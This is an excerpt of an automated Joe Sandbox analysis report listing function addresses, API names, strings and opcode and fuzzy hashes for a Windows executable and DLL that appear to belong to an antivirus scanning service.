                                                                                                                • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                                                • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                                                • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                                                • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                                                Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                                                • String ID: H
                                                                                                                • API String ID: 2107338056-2852464175
                                                                                                                • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                                                • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                                                • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                                                • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                                                Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                                                • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                                                • API String ID: 1322048431-2685357988
                                                                                                                • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                                                • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                                                • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                                                • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                                                Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                                                • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                                                • API String ID: 2984211723-3002863673
                                                                                                                • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                                                • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                                                • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                                                • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                                                Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                                                • API String ID: 678758403-4129911376
                                                                                                                • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                                                • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                                                • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                                                • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                                                Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3424473247-0
                                                                                                                • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                                                • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                                                • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                                                • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                                                Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                                                • String ID: bad exception$csm$csm$csm
                                                                                                                • API String ID: 3766904988-820278400
                                                                                                                • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                                                • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                                                • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                                                • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                                                Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2707001247-0
                                                                                                                • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                                                • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                                                • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                                                • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                                                Function 00007FFBC3204804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 849930591-393685449
                                                                                                                • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                                                • Instruction ID: 1356d442e3e1cbd580c23c4486f58e76ae064cc2ac78e26c56f4437b5130832d
                                                                                                                • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                                                • Instruction Fuzzy Hash: 31D171B29087458AEF10AF75D4807AE77A0FB55788F984135DA8D6BB55CF38E489CB00
                                                                                                                Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                                                • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                                                • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                                                • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                                                Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                                                • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                                                • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                                                • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                                                Function 00007FFBC320B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                                                • Instruction ID: a1cef2cd13d50d612b5117f40123c4705f743849a301ed93bbc353ed06221cba
                                                                                                                • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                                                • Instruction Fuzzy Hash: 7F41C1B1B19A0281EE25EF36E910EBB2391BF05B90F8C4535DD4D6B794DE3CE8098740
                                                                                                                Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                                                • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                                                • API String ID: 1119674940-1966266597
                                                                                                                • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                                                • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                                                • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                                                • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                                                Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                                                • API String ID: 3702919091-996641649
                                                                                                                • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                                                • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                                                • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                                                • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                                                Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775632426-0
                                                                                                                • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                                                • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                                                • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                                                • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                                                Function 00007FFBC320712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071B1
                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071BF
                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071E9
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207257
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                                                • Instruction ID: 557b634dfabaab833202b5a774b35273f93e90df1d8c47218e0ae8bfa7347e25
                                                                                                                • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                                                • Instruction Fuzzy Hash: FD31D4B1B1A74195FE15AF26E400DBA6794BF48B60F9D0634ED5D2F390DE3CE4498300
                                                                                                                Function 00007FFBC3209444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506987500-0
                                                                                                                • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                                                • Instruction ID: 2cb3988977a9158e39452ff99fdd54e8acfe6c828045fcd8ef4dd32b7d245c12
                                                                                                                • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                                                • Instruction Fuzzy Hash: 76213DB0A0C68245FE64BF31D65193B63519F447B0F9C0634E93F2EAE6DE2CA4499B00
                                                                                                                Function 00007FFBC3210100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
